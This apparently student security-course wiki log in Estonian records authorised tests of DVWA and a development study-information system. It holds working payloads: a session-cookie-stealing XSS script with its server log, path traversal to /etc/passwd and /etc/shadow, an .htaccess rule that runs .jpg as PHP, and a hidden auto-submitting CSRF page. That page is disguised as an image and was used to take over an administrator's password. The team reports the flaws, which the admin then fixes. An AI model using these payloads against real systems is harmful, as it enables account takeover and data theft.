Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
